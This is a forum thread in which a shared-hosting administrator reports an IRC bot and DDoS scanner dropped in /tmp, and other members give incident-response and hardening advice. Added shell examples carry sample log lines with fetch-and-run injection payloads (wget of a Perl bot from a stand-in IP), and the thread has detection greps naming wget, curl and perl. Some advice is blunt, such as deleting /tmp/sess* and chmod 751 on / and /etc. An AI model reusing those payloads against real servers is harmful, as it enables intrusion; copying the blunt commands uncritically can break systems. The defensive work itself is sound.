The Community Forums


Hacked?

Discussion in 'General Discussion' started by benNICHOLAS, May 28, 2007.

  1. benNICHOLAS

    benNICHOLAS Member

    Joined:
    Jul 13, 2003
    Messages:
    13
    Likes Received:
    0
    Trophy Points:
    0
    Looks like one of my servers has been hacked. :mad:

    In /tmp I have the following files:

    /tmp/QZVQKY21
    /tmp/scan.txt

    I'm attaching the files if anyone wants to see what they contain.

    How bad is this? Can I just remove the files, or does anyone know what to do?

    Thanks and regards!
     


  2. ChadE

    ChadE Active Member

    The first file looks like an IRC shell, and the second file has content that implies someone is trying to turn your server into a zombie machine for the purpose of launching DDoS attacks. I would delete them immediately. Depending on how you were infected, it's possible they injected these scripts remotely and the rest of your machine is still safe. However, your logs will be unreliable if they have gained total root access.

    Do you run RK Hunter? Also, do you have any firewalls, bruteforce scanners?

    I run RKhunter to find rootkits, APF/BFD for bruteforce and basic firewalling of my unneeded ports, and also a regular NMAP port scan. If you're running potentially insecure PHP scripts, you may benefit by using mod_security 1.X or 2.X (depending on your Apache version.)

    Also, check here for making your /tmp folder non-executable:
    http://www.eth0.us/tmp

    Other useful links:
    http://www.eth0.us/sysctl
    http://www.rootkit.nl/
    http://www.rfxnetworks.com/proj.php

    Also, do you provide shared hosting or do you just host a couple of websites?
     
    #2 ChadE, May 28, 2007
    Last edited: May 28, 2007
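The /tmp hardening ChadE links to above, turned into a check you can run. This is an added example, not code from the thread or from the linked page; the SAMPLE_MOUNTS lines are constructed for the demo and the fstab line in the comments is an assumed layout, not the poster's server.

```shell
#!/bin/sh
# Added example (not code from the thread): verify that /tmp and /var/tmp are
# mounted noexec,nosuid,nodev, reading /proc/mounts-format lines from stdin.
# SAMPLE_MOUNTS below is constructed for the demo, not taken from a real host.

# Print the mount options of mountpoint $1 (4th field of /proc/mounts), or "-"
# when it is not a separate mount. The last matching line wins, which is how
# the kernel orders stacked mounts.
mount_opts() {
    awk -v mp="$1" '$2 == mp { opts = $4 } END { print (opts == "" ? "-" : opts) }'
}

# Print the hardening options that are absent for mountpoint $1, space
# separated; print nothing when all three are present.
missing_opts() {
    opts=$(mount_opts "$1")
    missing=""
    for want in noexec nosuid nodev; do
        case ",$opts," in
            *",$want,"*) ;;
            *) missing="$missing $want" ;;
        esac
    done
    printf '%s\n' "${missing# }"
}

# Human-readable verdict for mountpoint $1.
check_mount() {
    m=$(missing_opts "$1")
    if [ -z "$m" ]; then
        echo "$1: OK"
    else
        echo "$1: MISSING $m"
    fi
}

# Constructed sample: a loopback-file /tmp (the 2007-era recipe) that forgot
# nodev, a correct /var/tmp, and no separate mount for /usr/tmp at all.
SAMPLE_MOUNTS='/dev/sda1 / ext3 rw,data=ordered 0 0
/dev/sda2 /home ext3 rw,nosuid 0 0
/dev/loop0 /tmp ext3 rw,noexec,nosuid 0 0
/dev/loop0 /var/tmp ext3 rw,noexec,nosuid,nodev 0 0
proc /proc proc rw 0 0'

for mp in /tmp /var/tmp /usr/tmp; do
    printf '%s\n' "$SAMPLE_MOUNTS" | check_mount "$mp"
done
# Demo output:
#   /tmp: MISSING nodev
#   /var/tmp: OK
#   /usr/tmp: MISSING noexec nosuid nodev

# On a live server:   check_mount /tmp < /proc/mounts
# To enforce it, an fstab line such as (assumed; adjust to your layout)
#   tmpfs  /tmp  tmpfs  defaults,noexec,nosuid,nodev  0 0
# followed by:  mount -o remount /tmp
```

One caveat worth keeping in mind: noexec stops `/tmp/QZVQKY21` from being run directly, but `perl /tmp/bot.pl` or `sh /tmp/x` still works because the interpreter, not the file, is what executes. It removes the easiest path and nothing more; the web application that let the files in still has to be found.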
  3. benNICHOLAS

    benNICHOLAS Member

    Thanks for your reply.

    I have deleted the files.

    I run ConfigServer Security & Firewall which they have configured and installed for me. I also use mod_security.

    This server is used for shared hosting, about 340 accounts.
     
  4. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    The most common means of protecting a network is using a firewall. The biggest problem with firewalls is that people think they're more than they actually are. A firewall's major strength is protecting against traffic-based attacks (DoS, DDoS, etc.). If hackers/spammers find their way into your network from the outside, it is very likely the firewall has no way of differentiating between a legitimate user and a hacker.

    Running a firewall and scanning tools including rkhunter and chkrootkit are not enough. You need to find and patch the offending scripts used by this amateur hacker. Otherwise, you might find more scripts like QZVQKY21 and scan.txt somewhere on your server.
     
  5. benNICHOLAS

    benNICHOLAS Member

    I ran chkrootkit now and got this:

    /proc/28755/fd: No such file or directory

    /var/www/mrtg/tcp.log

    /usr/lib/php/.registry /usr/lib/php/.registry/.channel.pecl.php.net /usr/lib/php/.registry/.channel.__uri /usr/lib/php/.channels /usr/lib/php/.channels/.alias
    INFECTED (PORTS: 465)
    You have 3 process hidden for readdir command
    You have 3 process hidden for ps command
    chkproc: Warning: Possible LKM Trojan installed

    Does anyone know how to solve this?
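What chkrootkit's "process hidden for readdir/ps" warning actually means, as an added example that is not part of the thread: it compares the PIDs it can reach under /proc with the PIDs that a directory listing of /proc and the output of ps admit to, and a PID present in one view but not another is being filtered. The three PID lists below are constructed for the demo (the numbers are made up and have nothing to do with the PID in the poster's output); live_check shows how to collect real ones.

```shell
#!/bin/sh
# Added example (not code from the thread): the comparison behind chkrootkit's
# "process hidden for readdir/ps" warning. A process reachable as /proc/<pid>
# that is absent from the /proc directory listing or from ps output is being
# hidden from that view, which is what an LKM rootkit does.

# Print PIDs present in list $1 but absent from list $2 (both whitespace
# separated), sorted numerically.
hidden_pids() {
    others=" $(printf '%s ' $2)"
    for p in $1; do
        case "$others" in
            *" $p "*) ;;
            *) echo "$p" ;;
        esac
    done | sort -n
}

# Constructed demo data: a box where something hides PIDs 4711 and 4712 from
# ps, and 4712 from the /proc directory listing as well.
PROC_VIEW="1 2 512 4711 9001"          # what  ls /proc | grep -E '^[0-9]+$'  returned
PS_VIEW="1 2 512 9001"                 # what  ps -eo pid=  returned
PROBE_VIEW="1 2 512 4711 4712 9001"    # what  [ -d /proc/$p ]  for every p found

echo "hidden from ps:";      hidden_pids "$PROBE_VIEW" "$PS_VIEW"     # 4711 4712
echo "hidden from readdir:"; hidden_pids "$PROBE_VIEW" "$PROC_VIEW"   # 4712

# Collect the real views. The probe walks /proc/<pid> with stat() instead of
# listing the directory, so a hooked getdents() does not filter it. Processes
# that start or exit between the three snapshots show up as false positives:
# run it twice and trust only PIDs that persist. With a large pid_max the
# probe loop takes a while in a shell; that is acceptable for a one-off check.
live_check() {
    proc_view=$(ls /proc | grep -E '^[0-9]+$')
    ps_view=$(ps -eo pid=)
    max=$(cat /proc/sys/kernel/pid_max 2>/dev/null || echo 32768)
    probe_view=$(p=1; while [ "$p" -le "$max" ]; do
                     [ -d "/proc/$p" ] && echo "$p"; p=$((p + 1)); done)
    echo "hidden from ps:";      hidden_pids "$probe_view" "$ps_view"
    echo "hidden from readdir:"; hidden_pids "$probe_view" "$proc_view"
}
# On a live system, as root:   live_check
```

A persistent hit from live_check on a box whose ps, ls and kernel you no longer trust is confirmation, not a lead: the tools doing the comparison may themselves be replaced, which is why the usual advice once a kernel-level rootkit is suspected is to take the disk to a clean system rather than keep diagnosing in place.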
     
  6. eNetHosts

    eNetHosts Well-Known Member

    Have you changed your root password yet?

    How many of the 340 accounts are allowed to use SSH?
     
  7. benNICHOLAS

    benNICHOLAS Member


    I changed the password now.

    About 10 accounts have SSH access.
     
  8. eNetHosts

    eNetHosts Well-Known Member

    I would recommend denying their SSH access for the time being, until this gets sorted.

    Unless you explicitly trust any of them.
     
  9. benNICHOLAS

    benNICHOLAS Member

    Now only root has SSH access.

    Does anyone know what to do with /usr/lib/php/.registry /usr/lib/php/.registry/.channel.pecl.php.net /usr/lib/php/.registry/.channel.__uri /usr/lib/php/.channels /usr/lib/php/.channels/.alias

    Can I remove those folders?
     
  10. eNetHosts

    eNetHosts Well-Known Member

    We have these directories on our new VDS, which doesn't currently have any users on it except staff.

    I would say no, because they look like part of the OS or cPanel setup.

    Any unusual processes running or excessive CPU usage showing? (via cPanel)
     
    #10 eNetHosts, Jun 2, 2007
    Last edited: Jun 2, 2007
  11. benNICHOLAS

    benNICHOLAS Member

    Thanks!

    No unusual processes, and the CPU load is now fine. Guess I have to monitor it for a while.
     
  12. WhmSonic

    WhmSonic Well-Known Member

    Looks like someone is trying to use your server for a botnet attack. You are not done! I checked your exploits, and these exploits come from one of the websites you host: a forum, an upload script, or some other PHP script with a security problem.

    - You must find which website caused the problem, or people will load the exploit again.

    First you must make sure your server is not running another httpd. These exploits create another simple httpd service for the botnet attack.

    How To Check:
    Code:
    service httpd stop; ps auxwww | grep '[h]ttpd'   # the [h] keeps the grep process itself out of the listing
    This stops the root httpd service. Then you check for httpd with the ps aux command: if you see any httpd running under the nobody user after stopping the root httpd, this means you still have exploits and your server is running the botnet. If it shows nothing, maybe the botnet is not running, but you may still have exploits and must make sure. Remember to start your Apache again with service httpd start.

    - Update the slocate database and search for exploits; this will take 10-15 min:
    Code:
    updatedb
    When complete, continue below.

    - Search the logs for curl|wget|chmod|gcc|perl scripts. This will show you which website uploaded shell scripts, or which website has a security problem that the hacker used:
    Code:
    grep -Ei '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*
    - Search for shell code:
    Code:
    grep -l '\\x90' /usr/local/apache/logs/*   # Apache writes raw bytes to the log as \xHH, so a NOP sled shows up as \x90\x90...
    - Search for hidden dirs:
    Code:
    locate "..."
    locate ".. "
    locate " .."
    locate ". "
    locate " ."
    - Search for running Perl scripts (important: 99% of exploits are coded in Perl). Check whether the nobody user is running perl on your server; 99% of the time it will be an exploit:
    Code:
    ps aux | grep '[p]erl'

    - A lot of times attackers will save their files to look similar to session files:
    Code:
    rm -rf /tmp/sess*
    Also check the /var/tmp dir for an error_log file. If you see this file, do not delete it; open it and read it, because this file is your gun. Open this file and read it and you will see access errors, blah blah blah, and /home/username/public_html/forum or a file. If you have luck, that's it: you have found which website has the security problem on your server, so suspend this website or remove its problem script file.

    Disable some important PHP functions in your php.ini. This is very important to secure your server from customers' mistakes.

    Open your php.ini file. If you are using ZendOptimizer: pico /usr/local/Zend/etc/php.ini. If you are not using Zend, your php.ini will be: pico /usr/local/lib/php.ini

    Open your php.ini, find the line disable_functions, and add the functions below to disable_functions:
    Code:
    system,passthru,exec,popen,proc_close,proc_get_status,proc_nice,proc_open
    your php.ini will be like this:
    Code:
    disable_functions = system,passthru,exec,popen,proc_close,proc_get_status,proc_nice,proc_open
    ; allow_url_fopen is an ini directive, not a function, so listing it in
    ; disable_functions has no effect; turn it off on its own line instead
    allow_url_fopen = Off
    Save your php.ini and restart your Apache.

    Make a little chmod to /home and / to force shell customers and all users to be able to see only their own /home/username. If you don't set these chmods, anyone who has SSH access on your server, and also some PHP and Perl scripts, will be able to see your /home and other users' files.

    Code:
    chmod 751 /home
    chmod 751 /etc
    chmod 751 /
    I hope I have provided useful information and you can solve your problem. If you can't, just send me a PM on the forum and I will help you more.
     
    #12 WhmSonic, Jun 3, 2007
    Last edited: Jun 3, 2007
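The log search WhmSonic describes above, as reusable functions run over constructed Apache access-log lines so the result can be checked. This is an added example, not code from the thread: the regex merges the post's two grep commands (the `%20` one and the `\x90` one) and, going a little beyond the post, also accepts `+` or a literal space after the command name. Every path, address and request in SAMPLE_LOG is made up for the demo; nothing here is from the poster's server.

```shell
#!/bin/sh
# Added example (not code from the thread): the post's log searches as
# functions that read access-log lines on stdin, plus two summaries that
# answer the real question: which script is being abused, and by whom.
# SAMPLE_LOG is constructed for the demo.

# Requests carrying the classic injection markers: PHP eval helpers
# (chr( / system( ), a downloader or compiler name followed by a space
# (%20, + or a literal space), or a NOP sled (Apache writes raw bytes as \x90).
suspicious_requests() {
    grep -Ei 'chr\(|system\(|(curl|wget|chmod|gcc|perl)(%20|\+| )|\\x90'
}

# Which script on the server is being abused: request path (7th field of the
# combined log format) with the query string removed, most frequent first,
# printed as "<count> <path>".
abused_paths() {
    suspicious_requests | awk '{ print $7 }' | sed 's/?.*//' \
        | sort | uniq -c | sort -rn | awk '{ print $1, $2 }'
}

# Which client addresses are doing it, most frequent first.
attacker_ips() {
    suspicious_requests | awk '{ print $1 }' \
        | sort | uniq -c | sort -rn | awk '{ print $1, $2 }'
}

# Constructed sample (combined log format): two hits on a forum script, one
# on a CGI, one NOP sled probe, and two benign requests.
SAMPLE_LOG='203.0.113.5 - - [28/May/2007:03:12:44 +0200] "GET /forum/index.php?page=http://198.51.100.7/x.txt?&cmd=cd%20/tmp;wget%20198.51.100.7/bot.pl;perl%20bot.pl HTTP/1.1" 200 1234 "-" "Mozilla/4.0"
203.0.113.9 - - [28/May/2007:03:13:01 +0200] "GET /index.php?id=1 HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
203.0.113.5 - - [28/May/2007:03:13:30 +0200] "GET /forum/index.php?act=Search&q=system(%27id%27) HTTP/1.1" 200 980 "-" "Mozilla/4.0"
192.0.2.77 - - [28/May/2007:03:14:10 +0200] "POST /gallery/upload.php HTTP/1.1" 200 55 "-" "Mozilla/5.0"
198.51.100.2 - - [28/May/2007:03:15:00 +0200] "GET /cgi-bin/stats.cgi?cfg=|wget%20198.51.100.7/c.pl;chmod%20%2Bx%20c.pl| HTTP/1.1" 404 300 "-" "-"
203.0.113.5 - - [28/May/2007:03:16:12 +0200] "GET /\x90\x90\x90\x90\x90\x90\x90\x90 HTTP/1.0" 400 226 "-" "-"'

echo "abused paths:"
printf '%s\n' "$SAMPLE_LOG" | abused_paths
# 2 /forum/index.php   (then the two single hits, in either order)
echo "attacker ips:"
printf '%s\n' "$SAMPLE_LOG" | attacker_ips
# 3 203.0.113.5
# 1 198.51.100.2

# On a cPanel box the per-domain logs live under /usr/local/apache/domlogs/
# (assumed default location), so the file name already names the account:
#   for f in /usr/local/apache/domlogs/*; do
#       suspicious_requests < "$f" | sed "s|^|$(basename "$f") |"
#   done
```

The first line of abused_paths is the script to look at (here a forum index.php that accepts a remote URL in `page=`), and the per-domain log it came from is the account to suspend while it is fixed. The markers only catch the lazy encodings; an attacker who double-encodes or sends the payload in a POST body leaves nothing in the access log, so an empty result is not a clean bill of health.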
  13. benNICHOLAS

    benNICHOLAS Member

    Thank you very, very much WhmSonic.

    I'll go through your steps as soon as possible.
     